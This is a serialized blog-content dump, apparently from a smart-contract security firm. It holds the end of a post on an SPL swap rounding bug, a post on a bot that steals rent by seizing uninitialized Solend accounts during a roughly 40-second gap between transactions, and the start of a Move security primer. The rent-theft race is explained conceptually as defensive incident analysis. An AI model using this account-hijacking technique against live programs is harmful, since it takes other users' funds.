rops":4589,"children":4590},{"style":370},[4591],{"type":33,"value":2780},{"type":28,"tag":116,"props":4593,"children":4594},{"style":272},[4595],{"type":33,"value":2785},{"type":28,"tag":116,"props":4597,"children":4598},{"style":266},[4599],{"type":33,"value":825},{"type":28,"tag":116,"props":4601,"children":4602},{"style":350},[4603],{"type":33,"value":2794},{"type":28,"tag":116,"props":4605,"children":4606},{"style":266},[4607],{"type":33,"value":1829},{"type":28,"tag":116,"props":4609,"children":4610},{"style":370},[4611],{"type":33,"value":2803},{"type":28,"tag":116,"props":4613,"children":4614},{"style":282},[4615],{"type":33,"value":2808},{"type":28,"tag":116,"props":4617,"children":4618},{"style":266},[4619],{"type":33,"value":313},{"type":28,"tag":116,"props":4621,"children":4622},{"style":272},[4623],{"type":33,"value":2893},{"type":28,"tag":116,"props":4625,"children":4626},{"style":266},[4627],{"type":33,"value":1829},{"type":28,"tag":116,"props":4629,"children":4630},{"style":370},[4631],{"type":33,"value":2803},{"type":28,"tag":116,"props":4633,"children":4634},{"style":282},[4635],{"type":33,"value":2906},{"type":28,"tag":116,"props":4637,"children":4638},{"style":266},[4639],{"type":33,"value":313},{"type":28,"tag":116,"props":4641,"children":4642},{"style":272},[4643],{"type":33,"value":2915},{"type":28,"tag":116,"props":4645,"children":4646},{"style":266},[4647],{"type":33,"value":1829},{"type":28,"tag":116,"props":4649,"children":4650},{"style":370},[4651],{"type":33,"value":2825},{"type":28,"tag":116,"props":4653,"children":4654},{"style":266},[4655],{"type":33,"value":1829},{"type":28,"tag":116,"props":4657,"children":4658},{"style":370},[4659],{"type":33,"value":2825},{"type":28,"tag":116,"props":4661,"children":4662},{"style":266},[4663],{"type":33,"value":384},{"type":28,"tag":116,"props":4665,"children":4666},{"class":245,"line":631},[4667,4671,4675,4679,4683,4687],{"type":28,"tag":116,"props":4668,"children":4669},{"style":370},[4670],{"type":33,"value":3996},{"type":28,"tag":116,"props":4672,"children":4673},{"style":260},[4674],{"type":33,"value":2943},{"type":28,"tag":116,"props":4676,"children":4677},{"style":272},[4678],{"type":33,"value":2682},{"type":28,"tag":116,"props":4680,"children":4681},{"style":370},[4682],{"type":33,"value":2953},{"type":28,"tag":116,"props":4684,"children":4685},{"style":272},[4686],{"type":33,"value":4391},{"type":28,"tag":116,"props":4688,"children":4689},{"style":266},[4690],{"type":33,"value":1291},{"type":28,"tag":116,"props":4692,"children":4693},{"class":245,"line":665},[4694,4698,4702,4706,4710,4714,4718,4722,4726,4730,4734,4738,4742,4746,4750,4754,4758,4762,4766,4770,4774,4778,4782],{"type":28,"tag":116,"props":4695,"children":4696},{"style":370},[4697],{"type":33,"value":2268},{"type":28,"tag":116,"props":4699,"children":4700},{"style":376},[4701],{"type":33,"value":2736},{"type":28,"tag":116,"props":4703,"children":4704},{"style":266},[4705],{"type":33,"value":269},{"type":28,"tag":116,"props":4707,"children":4708},{"style":272},[4709],{"type":33,"value":2745},{"type":28,"tag":116,"props":4711,"children":4712},{"style":266},[4713],{"type":33,"value":825},{"type":28,"tag":116,"props":4715,"children":4716},{"style":272},[4717],{"type":33,"value":2754},{"type":28,"tag":116,"props":4719,"children":4720},{"style":266},[4721],{"type":33,"value":1609},{"type":28,"tag":116,"props":4723,"children":4724},{"style":370},[4725],{"type":33,"value":373},{"type":28,"tag":116,"props":4727,"children":4728},{"style":266},[4729],{"type":33,"value":269},{"type":28,"tag":116,"props":4731,"children":4732},{"style":282},[4733],{"type":33,"value":2771},{"type":28,"tag":116,"props":4735,"children":4736},{"style":266},[4737],{"type":33,"value":313},{"type":28,"tag":116,"props":4739,"children":4740},{"style":370},[4741],{"type":33,"value":2780},{"type":28,"tag":116,"props":4743,"children":4744},{"style":272},[4745],{"type":33,"value":2785},{"type":28,"tag":116,"props":4747,"children":4748},{"style":266},[4749],{"type":33,"value":825},{"type":28,"tag":116,"props":4751,"children":4752},{"style":350},[4753],{"type":33,"value":2794},{"type":28,"tag":116,"props":4755,"children":4756},{"style":266},[4757],{"type":33,"value":1829},{"type":28,"tag":116,"props":4759,"children":4760},{"style":370},[4761],{"type":33,"value":2803},{"type":28,"tag":116,"props":4763,"children":4764},{"style":282},[4765],{"type":33,"value":2808},{"type":28,"tag":116,"props":4767,"children":4768},{"style":266},[4769],{"type":33,"value":313},{"type":28,"tag":116,"props":4771,"children":4772},{"style":272},[4773],{"type":33,"value":1797},{"type":28,"tag":116,"props":4775,"children":4776},{"style":266},[4777],{"type":33,"value":1829},{"type":28,"tag":116,"props":4779,"children":4780},{"style":370},[4781],{"type":33,"value":2825},{"type":28,"tag":116,"props":4783,"children":4784},{"style":266},[4785],{"type":33,"value":2830},{"type":28,"tag":116,"props":4787,"children":4788},{"class":245,"line":713},[4789,4793,4797,4801,4805,4809,4813,4817,4821,4825,4829,4833,4837,4841,4845,4849,4853,4857,4861,4865,4869,4873,4877,4881,4885],{"type":28,"tag":116,"props":4790,"children":4791},{"style":370},[4792],{"type":33,"value":2268},{"type":28,"tag":116,"props":4794,"children":4795},{"style":370},[4796],{"type":33,"value":2838},{"type":28,"tag":116,"props":4798,"children":4799},{"style":282},[4800],{"type":33,"value":2843},{"type":28,"tag":116,"props":4802,"children":4803},{"style":266},[4804],{"type":33,"value":313},{"type":28,"tag":116,"props":4806,"children":4807},{"style":282},[4808],{"type":33,"value":2852},{"type":28,"tag":116,"props":4810,"children":4811},{"style":266},[4812],{"type":33,"value":313},{"type":28,"tag":116,"props":4814,"children":4815},{"style":370},[4816],{"type":33,"value":2780},{"type":28,"tag":116,"props":4818,"children":4819},{"style":272},[4820],{"type":33,"value":2785},{"type":28,"tag":116,"props":4822,"children":4823},{"style":266},[4824],{"type":33,"value":825},{"type":28,"tag":116,"props":4826,"children":4827},{"style":350},[4828],{"type":33,"value":2794},{"type":28,"tag":116,"props":4830,"children":4831},{"style":266},[4832],{"type":33,"value":1829},{"type":28,"tag":116,"props":4834,"children":4835},{"style":370},[4836],{"type":33,"value":2803},{"type":28,"tag":116,"props":4838,"children":4839},{"style":282},[4840],{"type":33,"value":2808},{"type":28,"tag":116,"props":4842,"children":4843},{"style":266},[4844],{"type":33,"value":313},{"type":28,"tag":116,"props":4846,"children":4847},{"style":272},[4848],{"type":33,"value":2893},{"type":28,"tag":116,"props":4850,"children":4851},{"style":266},[4852],{"type":33,"value":1829},{"type":28,"tag":116,"props":4854,"children":4855},{"style":370},[4856],{"type":33,"value":2803},{"type":28,"tag":116,"props":4858,"children":4859},{"style":282},[4860],{"type":33,"value":2906},{"type":28,"tag":116,"props":4862,"children":4863},{"style":266},[4864],{"type":33,"value":313},{"type":28,"tag":116,"props":4866,"children":4867},{"style":272},[4868],{"type":33,"value":2915},{"type":28,"tag":116,"props":4870,"children":4871},{"style":266},[4872],{"type":33,"value":1829},{"type":28,"tag":116,"props":4874,"children":4875},{"style":370},[4876],{"type":33,"value":2825},{"type":28,"tag":116,"props":4878,"children":4879},{"style":266},[4880],{"type":33,"value":1829},{"type":28,"tag":116,"props":4882,"children":4883},{"style":370},[4884],{"type":33,"value":2825},{"type":28,"tag":116,"props":4886,"children":4887},{"style":266},[4888],{"type":33,"value":384},{"type":28,"tag":116,"props":4890,"children":4891},{"class":245,"line":750},[4892,4896,4900,4904,4908,4912],{"type":28,"tag":116,"props":4893,"children":4894},{"style":370},[4895],{"type":33,"value":2268},{"type":28,"tag":116,"props":4897,"children":4898},{"style":260},[4899],{"type":33,"value":2943},{"type":28,"tag":116,"props":4901,"children":4902},{"style":272},[4903],{"type":33,"value":2948},{"type":28,"tag":116,"props":4905,"children":4906},{"style":370},[4907],{"type":33,"value":2953},{"type":28,"tag":116,"props":4909,"children":4910},{"style":272},[4911],{"type":33,"value":2682},{"type":28,"tag":116,"props":4913,"children":4914},{"style":266},[4915],{"type":33,"value":1291},{"type":28,"tag":116,"props":4917,"children":4918},{"class":245,"line":779},[4919,4924],{"type":28,"tag":116,"props":4920,"children":4921},{"style":260},[4922],{"type":33,"value":4923},"             break",{"type":28,"tag":116,"props":4925,"children":4926},{"style":266},[4927],{"type":33,"value":384},{"type":28,"tag":116,"props":4929,"children":4930},{"class":245,"line":796},[4931,4935,4939,4943],{"type":28,"tag":116,"props":4932,"children":4933},{"style":370},[4934],{"type":33,"value":2268},{"type":28,"tag":116,"props":4936,"children":4937},{"style":266},[4938],{"type":33,"value":2981},{"type":28,"tag":116,"props":4940,"children":4941},{"style":260},[4942],{"type":33,"value":2986},{"type":28,"tag":116,"props":4944,"children":4945},{"style":266},[4946],{"type":33,"value":1291},{"type":28,"tag":116,"props":4948,"children":4949},{"class":245,"line":847},[4950,4954,4958,4962,4966],{"type":28,"tag":116,"props":4951,"children":4952},{"style":370},[4953],{"type":33,"value":2268},{"type":28,"tag":116,"props":4955,"children":4956},{"style":272},[4957],{"type":33,"value":2998},{"type":28,"tag":116,"props":4959,"children":4960},{"style":370},[4961],{"type":33,"value":2226},{"type":28,"tag":116,"props":4963,"children":4964},{"style":272},[4965],{"type":33,"value":2948},{"type":28,"tag":116,"props":4967,"children":4968},{"style":266},[4969],{"type":33,"value":384},{"type":28,"tag":116,"props":4971,"children":4972},{"class":245,"line":898},[4973],{"type":28,"tag":116,"props":4974,"children":4975},{"style":266},[4976],{"type":33,"value":4977},"         }\n",{"type":28,"tag":63,"props":4979,"children":4981},{"id":4980},"closing-thoughts",[4982],{"type":33,"value":4983},"Closing Thoughts",{"type":28,"tag":29,"props":4985,"children":4986},{},[4987],{"type":33,"value":4988},"This is a good example of how messing around and interacting with the ecosystem can lead to unexpected bugs. We found this, not as a result of active security research, but as part of our work in MEV and trading.",{"type":28,"tag":29,"props":4990,"children":4991},{},[4992,4994,5000],{"type":33,"value":4993},"Another interesting takeaway is that ",{"type":28,"tag":4995,"props":4996,"children":4997},"strong",{},[4998],{"type":33,"value":4999},"fuzzing can give a false sense of security",{"type":33,"value":5001},". Prior to our report, Saber had already deployed comprehensive fuzzers for their swap implementation. A researcher looking at code coverage alone might come to the incorrect conclusion that such extensively fuzzed code couldn't possibly have a vulnerability.",{"type":28,"tag":29,"props":5003,"children":5004},{},[5005,5007,5014],{"type":33,"value":5006},"One can see parallels to traditional security, as with Google Project Zero's ",{"type":28,"tag":87,"props":5008,"children":5011},{"href":5009,"rel":5010},"https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html",[91],[5012],{"type":33,"value":5013},"port-mortem of the NSS overflow",{"type":33,"value":141},{"type":28,"tag":29,"props":5016,"children":5017},{},[5018],{"type":28,"tag":206,"props":5019,"children":5021},{"alt":7,"src":5020},"/posts/spl-swap/p0.png",[],{"type":28,"tag":29,"props":5023,"children":5024},{},[5025],{"type":33,"value":5026},"A heavily fuzzed method had a trivial buffer overflow due to an arbitrary size limit on the input data. Implict assumptions can often undermine security.",{"type":28,"tag":29,"props":5028,"children":5029},{},[5030],{"type":33,"value":5031},"Especially with regard to onchain programs, it's important to consider what actually is a \"vulnerability\". Getting tokens from nothing is a more obvious example, but more subtle bugs can arise with increasingly complex defi interactions. Economic invariants are much harder to detect than say, memory corruption.",{"type":28,"tag":29,"props":5033,"children":5034},{},[5035],{"type":33,"value":5036},"A comprehensive evaluation of smart contracts relies on a deep understanding of economic implications within the Solana ecosystem.",{"type":28,"tag":2516,"props":5038,"children":5039},{},[5040],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":5042},[5043,5044,5045,5046],{"id":2590,"depth":256,"text":2593},{"id":3591,"depth":256,"text":3594},{"id":2019,"depth":256,"text":2022},{"id":4980,"depth":256,"text":4983},"content:blog:2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding",{"_path":5051,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":5052,"description":5053,"image":5054,"date":5058,"isFeatured":19,"onBlogPage":19,"tags":5059,"body":5060,"_type":2534,"_id":5384,"_source":2536,"_file":5385,"_stem":5386,"_extension":2539},"/blog/2022-08-19-solend-rent-thief","The Story of the Curious Rent Thief","A tale of pickpockets preying on the Solana ecosystem. Read our investigation into the persistent theft of rent from uninitialized accounts. This is the story of the Solend rent thief.",{"src":5055,"width":5056,"height":5057},"/posts/rent-thief/title.jpg",970,826,"2022-08-19",[2551,2552],{"type":25,"children":5061,"toc":5377},[5062,5067,5073,5078,5083,5088,5094,5107,5154,5185,5194,5199,5204,5209,5215,5228,5244,5249,5254,5269,5273,5278,5293,5300,5305,5315,5322,5326,5331,5337,5342,5347,5352,5358,5363],{"type":28,"tag":29,"props":5063,"children":5064},{},[5065],{"type":33,"value":5066},"Recently, there’s been a rent thief. This bot steals money from uninitialized accounts across the Solana ecosystem, claiming and profiting from the rent. The Solend team noticed the bot when it attempted an attack on the new permissionless pools that are being developed (to be clear, funds stored in the main Solend protocol are completely unaffected). Let's dig into how rent thieving works by doing a case study on an attack to one of the permissionless pools.",{"type":28,"tag":63,"props":5068,"children":5070},{"id":5069},"background",[5071],{"type":33,"value":5072},"Background",{"type":28,"tag":29,"props":5074,"children":5075},{},[5076],{"type":33,"value":5077},"To understand how this exploit works, we first have to understand a bit about how rent works in Solana.",{"type":28,"tag":29,"props":5079,"children":5080},{},[5081],{"type":33,"value":5082},"Since accounts can store data that every validator needs to download, Solana charges a certain amount of rent based on the amount of data. However, accounts that have enough for 2 years of rent payments are considered rent-exempt as long as their balance never drops below the threshold. Fortunately, rent is very cheap, so it's not hard to make an account rent-exempt.",{"type":28,"tag":29,"props":5084,"children":5085},{},[5086],{"type":33,"value":5087},"As such, when creating new accounts, most programs will need to transfer some SOL into the new account to make it rent-exempt.",{"type":28,"tag":63,"props":5089,"children":5091},{"id":5090},"the-exploit",[5092],{"type":33,"value":5093},"The Exploit",{"type":28,"tag":29,"props":5095,"children":5096},{},[5097,5099,5105],{"type":33,"value":5098},"New reserves (also known as assets) are added to a Solend pool by calling the ",{"type":28,"tag":98,"props":5100,"children":5102},{"className":5101},[],[5103],{"type":33,"value":5104},"init_reserve",{"type":33,"value":5106}," function, which creates 6 new accounts to store data about the reserve:",{"type":28,"tag":455,"props":5108,"children":5109},{},[5110,5115,5120,5125,5136,5141],{"type":28,"tag":459,"props":5111,"children":5112},{},[5113],{"type":33,"value":5114},"reserve detail - stores information about the reserve e.g liquidity mint, mint decimals, oracles, configs, etc.",{"type":28,"tag":459,"props":5116,"children":5117},{},[5118],{"type":33,"value":5119},"reserve liquidity token account - holds deposited tokens",{"type":28,"tag":459,"props":5121,"children":5122},{},[5123],{"type":33,"value":5124},"fee receiver token account - account which will receive origination fees on borrows",{"type":28,"tag":459,"props":5126,"children":5127},{},[5128,5130],{"type":33,"value":5129},"reserve collateral mint account - deposit receipt token, also known as ",{"type":28,"tag":98,"props":5131,"children":5133},{"className":5132},[],[5134],{"type":33,"value":5135},"cTokens",{"type":28,"tag":459,"props":5137,"children":5138},{},[5139],{"type":33,"value":5140},"reserve collateral token account - holds users' collateral tokens",{"type":28,"tag":459,"props":5142,"children":5143},{},[5144,5146,5152],{"type":33,"value":5145},"creator collateral token account - creator's ",{"type":28,"tag":98,"props":5147,"children":5149},{"className":5148},[],[5150],{"type":33,"value":5151},"cToken",{"type":33,"value":5153}," account",{"type":28,"tag":29,"props":5155,"children":5156},{},[5157,5159,5164,5166,5171,5173,5178,5180],{"type":33,"value":5158},"Account creation and initialization are ",{"type":28,"tag":2583,"props":5160,"children":5161},{},[5162],{"type":33,"value":5163},"usually",{"type":33,"value":5165}," done within the same transactions. However, due to Solana's transaction size limit of 1232 bytes, the creation and initialization of these 6 accounts had to be separated into 2 transactions, creation and initialization. Here's what a call to ",{"type":28,"tag":98,"props":5167,"children":5169},{"className":5168},[],[5170],{"type":33,"value":5104},{"type":33,"value":5172}," is ",{"type":28,"tag":2583,"props":5174,"children":5175},{},[5176],{"type":33,"value":5177},"supposed",{"type":33,"value":5179}," to look like:\n",{"type":28,"tag":206,"props":5181,"children":5184},{"src":5182,"alt":5183},"/posts/rent-thief/transacdiagram.png","drawing",[],{"type":28,"tag":29,"props":5186,"children":5187},{},[5188,5190],{"type":33,"value":5189},"Notice anything amiss? In between the two transactions, the account has rent money but no owner. This is where the rent thief comes in to snatch the account, along with its rent:\n",{"type":28,"tag":206,"props":5191,"children":5193},{"src":5192,"alt":5183},"/posts/rent-thief/attacktransac.png",[],{"type":28,"tag":29,"props":5195,"children":5196},{},[5197],{"type":33,"value":5198},"Since there was a roughly 40 second (50 slot) window in between the two transactions, such an attack was very consistent.",{"type":28,"tag":29,"props":5200,"children":5201},{},[5202],{"type":33,"value":5203},"Fortunately, rent is relatively cheap so the entire attack only extracts about 0.0082 SOL every iteration (4 token accounts each worth around 0.002 SOL), which is around 28 cents at the time of writing this article.",{"type":28,"tag":29,"props":5205,"children":5206},{},[5207],{"type":33,"value":5208},"Despite this lost cost, this is pretty annoying...",{"type":28,"tag":63,"props":5210,"children":5212},{"id":5211},"example",[5213],{"type":33,"value":5214},"Example",{"type":28,"tag":29,"props":5216,"children":5217},{},[5218,5220,5227],{"type":33,"value":5219},"Let's take a look at ",{"type":28,"tag":87,"props":5221,"children":5224},{"href":5222,"rel":5223},"https://explorer.solana.com/address/2PUTo74Vbt9fXVoTywjTFZNnWGckWS98HnruXvZJaj4N",[91],[5225],{"type":33,"value":5226},"a real attack",{"type":33,"value":141},{"type":28,"tag":29,"props":5229,"children":5230},{},[5231,5238,5240],{"type":28,"tag":87,"props":5232,"children":5235},{"href":5233,"rel":5234},"https://explorer.solana.com/tx/9yon9Av2sBq78bZ92Pa28p8gef5MUEQL3sBLGVzxK3RNGYsN2nLnTrbqS1wMCvJdinKE8CC9SwCuUYuNBwrNFNy",[91],[5236],{"type":33,"value":5237},"Transaction 1",{"type":33,"value":5239},":\n",{"type":28,"tag":206,"props":5241,"children":5243},{"alt":7,"src":5242},"https://i.imgur.com/xJvIwgc.png",[],{"type":28,"tag":29,"props":5245,"children":5246},{},[5247],{"type":33,"value":5248},"(...more accounts truncated)",{"type":28,"tag":29,"props":5250,"children":5251},{},[5252],{"type":33,"value":5253},"The developer creates a couple accounts and transfers enough SOL for them to be rent-exempt. This took place in slot 136,580,113.",{"type":28,"tag":29,"props":5255,"children":5256},{},[5257,5264,5265],{"type":28,"tag":87,"props":5258,"children":5261},{"href":5259,"rel":5260},"https://explorer.solana.com/tx/22beQSDReFGK4KAgarAz4MbibpxaFHiARd3yaCDZ4wmKSNoTcxmKMp6uRNA2CY4xAAZVZZCDg522aJ7jXftyhtSE",[91],[5262],{"type":33,"value":5263},"Attacker's Transaction",{"type":33,"value":5239},{"type":28,"tag":206,"props":5266,"children":5268},{"alt":7,"src":5267},"https://i.imgur.com/CpSKuL3.png",[],{"type":28,"tag":29,"props":5270,"children":5271},{},[5272],{"type":33,"value":5248},{"type":28,"tag":29,"props":5274,"children":5275},{},[5276],{"type":33,"value":5277},"As detailed before, the attacker takes ownership of the newly created accounts. This took place in slot 136,580,154, which is 41 slots (29 seconds) after the initial transaction.",{"type":28,"tag":29,"props":5279,"children":5280},{},[5281,5288,5289],{"type":28,"tag":87,"props":5282,"children":5285},{"href":5283,"rel":5284},"https://explorer.solana.com/tx/beYo1YBCa4fQ8swdJchx9s4qtgDQV4oVSEqwAX7UpHan4U4Jsv1oxY2V2ZxE77pBQHzYwV4gCXpDDKTgM7kBT4y",[91],[5286],{"type":33,"value":5287},"Transaction 2",{"type":33,"value":5239},{"type":28,"tag":206,"props":5290,"children":5292},{"alt":7,"src":5291},"https://i.imgur.com/of0GIdw.png",[],{"type":28,"tag":29,"props":5294,"children":5295},{},[5296],{"type":28,"tag":206,"props":5297,"children":5299},{"alt":7,"src":5298},"https://i.imgur.com/0STSyv8.png",[],{"type":28,"tag":29,"props":5301,"children":5302},{},[5303],{"type":33,"value":5304},"The developer attempts to take ownership of the account, but it fails with the error \"account or token already in use\" since the attacker took ownership of it. This took place in slot 136,580,167, which is 13 slots (9 seconds) after the attacker's transaction. In total, that's a 54 slot-gap (38 seconds) between the two Solend transactions.",{"type":28,"tag":29,"props":5306,"children":5307},{},[5308,5314],{"type":28,"tag":87,"props":5309,"children":5312},{"href":5310,"rel":5311},"https://explorer.solana.com/tx/3D45bCbbeSEaigz3RX6GRKuoDSok3FHMi5Z2N5HDXcPjqMzu3Qx5iEoXh56RWg1mn7w9ZuZifD91n1DwnPjdaW2G",[91],[5313],{"type":33,"value":5263},{"type":33,"value":4160},{"type":28,"tag":29,"props":5316,"children":5317},{},[5318],{"type":28,"tag":206,"props":5319,"children":5321},{"alt":7,"src":5320},"https://i.imgur.com/AmSPdmy.png",[],{"type":28,"tag":29,"props":5323,"children":5324},{},[5325],{"type":33,"value":5248},{"type":28,"tag":29,"props":5327,"children":5328},{},[5329],{"type":33,"value":5330},"Now that the attack is over, the attacker closes the accounts, transferring the rent money to themselves. The total money stolen during this attack was 0.00815212 SOL.",{"type":28,"tag":63,"props":5332,"children":5334},{"id":5333},"impact",[5335],{"type":33,"value":5336},"Impact",{"type":28,"tag":29,"props":5338,"children":5339},{},[5340],{"type":33,"value":5341},"Rent-thieving attacks don't steal much money.",{"type":28,"tag":29,"props":5343,"children":5344},{},[5345],{"type":33,"value":5346},"They can only make a small profit very infrequently as Solana rent is cheap and there are only a handful of large services that separate account creation and initialization. In addition, this stratedgy doesn't scale well, since such non-atomic account creation is relatively infrequent.",{"type":28,"tag":29,"props":5348,"children":5349},{},[5350],{"type":33,"value":5351},"However, it's still obnoxious even if the monetary impact is minimal. Transactions will fail and need to be remade, impacting usability.",{"type":28,"tag":63,"props":5353,"children":5355},{"id":5354},"solution",[5356],{"type":33,"value":5357},"Solution",{"type":28,"tag":29,"props":5359,"children":5360},{},[5361],{"type":33,"value":5362},"As a temporary stopgap, Solend refactored their codebase to lower the 40 second delay between transactions to around 15 seconds (20 slots), making an attack much more difficult and inconsistent.",{"type":28,"tag":29,"props":5364,"children":5365},{},[5366,5368,5375],{"type":33,"value":5367},"As a more permenant solution, Solend implemented ",{"type":28,"tag":87,"props":5369,"children":5372},{"href":5370,"rel":5371},"https://explorer.solana.com/tx/3DR74oQh966HbozLPYFqTgCmQWbUNSBkjUcEs7CuWxMPNxM3mBzqH7Gqu1mVRBRxNSTWJBcJkTnCzmoqD6kPYMXE?cluster=devnet",[91],[5373],{"type":33,"value":5374},"an onchain program",{"type":33,"value":5376}," which handles account creation, allowing them to fit all the relevant instructions into one transaction.",{"title":7,"searchDepth":256,"depth":256,"links":5378},[5379,5380,5381,5382,5383],{"id":5069,"depth":256,"text":5072},{"id":5090,"depth":256,"text":5093},{"id":5211,"depth":256,"text":5214},{"id":5333,"depth":256,"text":5336},{"id":5354,"depth":256,"text":5357},"content:blog:2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief",{"_path":5388,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":5389,"description":5390,"author":5391,"image":5392,"date":5396,"isFeatured":19,"onBlogPage":19,"body":5397,"_type":2534,"_id":8924,"_source":2536,"_file":8925,"_stem":8926,"_extension":2539},"/blog/2022-09-06-move-introduction","Move: An Auditor's Introduction","What actually makes Move secure? A discussion of Move's typing system and formal verification.","robert",{"src":5393,"height":5394,"width":5395},"/posts/move-intro/title.jpg",1221,1400,"2022-09-06",{"type":25,"children":5398,"toc":8919},[5399,5404,5409,5428,5434,5446,5544,5552,5671,5679,5701,5854,5859,6117,6139,6174,6179,6199,6204,6215,6227,6439,6451,6465,6478,6735,6747,6968,6973,7001,7147,7166,7171,7436,7448,7453,7466,7472,7477,7482,7494,7508,7513,7612,7624,7637,7911,7916,7928,7933,7987,8007,8012,8888,8892,8897,8902,8915],{"type":28,"tag":29,"props":5400,"children":5401},{},[5402],{"type":33,"value":5403},"As part of our work, we seek to understand how to eliminate vulnerability classes. Designing safer languages enables developers to write code with confidence. How exactly does Move lend itself to safer programming practices? What can we learn from Move to generalize secure design principles for other execution environments?",{"type":28,"tag":29,"props":5405,"children":5406},{},[5407],{"type":33,"value":5408},"Lately, there appears to be many buzzwords floating around. Formal verification, type based safety, \"rust but for blockchain\".",{"type":28,"tag":29,"props":5410,"children":5411},{},[5412,5414,5419,5421,5426],{"type":33,"value":5413},"In this piece I'll seek to discuss exactly ",{"type":28,"tag":2583,"props":5415,"children":5416},{},[5417],{"type":33,"value":5418},"how",{"type":33,"value":5420}," move lends itself to more secure programming practices, potential shortcomings, and practical design tips for protocol developers looking to build ",{"type":28,"tag":2583,"props":5422,"children":5423},{},[5424],{"type":33,"value":5425},"structurally",{"type":33,"value":5427}," safer programs.",{"type":28,"tag":63,"props":5429,"children":5431},{"id":5430},"types",[5432],{"type":33,"value":5433},"Types",{"type":28,"tag":29,"props":5435,"children":5436},{},[5437,5439,5445],{"type":33,"value":5438},"One of the key selling points of Move is the use of typed resources. Aptos and Sui have slight variations in how they materialize this pattern, but as an example take ",{"type":28,"tag":98,"props":5440,"children":5442},{"className":5441},[],[5443],{"type":33,"value":5444},"coin.move",{"type":33,"value":141},{"type":28,"tag":234,"props":5447,"children":5449},{"className":2652,"code":5448,"language":2651,"meta":7,"style":7},"  /// Main structure representing a coin/token in an account's custody.\n  struct Coin\u003Cphantom CoinType> has store {\n      /// Amount of coin this address has.\n      value: u64,\n  }\n",[5450],{"type":28,"tag":98,"props":5451,"children":5452},{"__ignoreMap":7},[5453,5461,5507,5515,5536],{"type":28,"tag":116,"props":5454,"children":5455},{"class":245,"line":246},[5456],{"type":28,"tag":116,"props":5457,"children":5458},{"style":250},[5459],{"type":33,"value":5460},"  /// Main structure representing a coin/token in an account's custody.\n",{"type":28,"tag":116,"props":5462,"children":5463},{"class":245,"line":256},[5464,5469,5474,5478,5483,5488,5493,5498,5503],{"type":28,"tag":116,"props":5465,"children":5466},{"style":376},[5467],{"type":33,"value":5468},"  struct",{"type":28,"tag":116,"props":5470,"children":5471},{"style":339},[5472],{"type":33,"value":5473}," Coin",{"type":28,"tag":116,"props":5475,"children":5476},{"style":266},[5477],{"type":33,"value":514},{"type":28,"tag":116,"props":5479,"children":5480},{"style":272},[5481],{"type":33,"value":5482},"phantom",{"type":28,"tag":116,"props":5484,"children":5485},{"style":339},[5486],{"type":33,"value":5487}," CoinType",{"type":28,"tag":116,"props":5489,"children":5490},{"style":266},[5491],{"type":33,"value":5492},"> ",{"type":28,"tag":116,"props":5494,"children":5495},{"style":272},[5496],{"type":33,"value":5497},"has",{"type":28,"tag":116,"props":5499,"children":5500},{"style":272},[5501],{"type":33,"value":5502}," store",{"type":28,"tag":116,"props":5504,"children":5505},{"style":266},[5506],{"type":33,"value":1291},{"type":28,"tag":116,"props":5508,"children":5509},{"class":245,"line":293},[5510],{"type":28,"tag":116,"props":5511,"children":5512},{"style":250},[5513],{"type":33,"value":5514},"      /// Amount of coin this address has.\n",{"type":28,"tag":116,"props":5516,"children":5517},{"class":245,"line":361},[5518,5523,5527,5532],{"type":28,"tag":116,"props":5519,"children":5520},{"style":272},[5521],{"type":33,"value":5522},"      value",{"type":28,"tag":116,"props":5524,"children":5525},{"style":370},[5526],{"type":33,"value":4160},{"type":28,"tag":116,"props":5528,"children":5529},{"style":339},[5530],{"type":33,"value":5531}," u64",{"type":28,"tag":116,"props":5533,"children":5534},{"style":266},[5535],{"type":33,"value":3178},{"type":28,"tag":116,"props":5537,"children":5538},{"class":245,"line":387},[5539],{"type":28,"tag":116,"props":5540,"children":5541},{"style":266},[5542],{"type":33,"value":5543},"  }\n",{"type":28,"tag":29,"props":5545,"children":5546},{},[5547],{"type":28,"tag":2583,"props":5548,"children":5549},{},[5550],{"type":33,"value":5551},"aptos",{"type":28,"tag":234,"props":5553,"children":5555},{"className":2652,"code":5554,"language":2651,"meta":7,"style":7},"  /// A coin of type `T` worth `value`. Transferable and storable\n  struct Coin\u003Cphantom T> has key, store {\n      id: UID,\n      balance: Balance\u003CT>\n  }\n",[5556],{"type":28,"tag":98,"props":5557,"children":5558},{"__ignoreMap":7},[5559,5567,5617,5634,5664],{"type":28,"tag":116,"props":5560,"children":5561},{"class":245,"line":246},[5562],{"type":28,"tag":116,"props":5563,"children":5564},{"style":250},[5565],{"type":33,"value":5566},"  /// A coin of type `T` worth `value`. Transferable and storable\n",{"type":28,"tag":116,"props":5568,"children":5569},{"class":245,"line":256},[5570,5574,5578,5582,5586,5591,5595,5599,5604,5608,5613],{"type":28,"tag":116,"props":5571,"children":5572},{"style":376},[5573],{"type":33,"value":5468},{"type":28,"tag":116,"props":5575,"children":5576},{"style":339},[5577],{"type":33,"value":5473},{"type":28,"tag":116,"props":5579,"children":5580},{"style":266},[5581],{"type":33,"value":514},{"type":28,"tag":116,"props":5583,"children":5584},{"style":272},[5585],{"type":33,"value":5482},{"type":28,"tag":116,"props":5587,"children":5588},{"style":339},[5589],{"type":33,"value":5590}," T",{"type":28,"tag":116,"props":5592,"children":5593},{"style":266},[5594],{"type":33,"value":5492},{"type":28,"tag":116,"props":5596,"children":5597},{"style":272},[5598],{"type":33,"value":5497},{"type":28,"tag":116,"props":5600,"children":5601},{"style":272},[5602],{"type":33,"value":5603}," key",{"type":28,"tag":116,"props":5605,"children":5606},{"style":266},[5607],{"type":33,"value":825},{"type":28,"tag":116,"props":5609,"children":5610},{"style":272},[5611],{"type":33,"value":5612},"store",{"type":28,"tag":116,"props":5614,"children":5615},{"style":266},[5616],{"type":33,"value":1291},{"type":28,"tag":116,"props":5618,"children":5619},{"class":245,"line":293},[5620,5625,5629],{"type":28,"tag":116,"props":5621,"children":5622},{"style":272},[5623],{"type":33,"value":5624},"      id",{"type":28,"tag":116,"props":5626,"children":5627},{"style":370},[5628],{"type":33,"value":4160},{"type":28,"tag":116,"props":5630,"children":5631},{"style":266},[5632],{"type":33,"value":5633}," 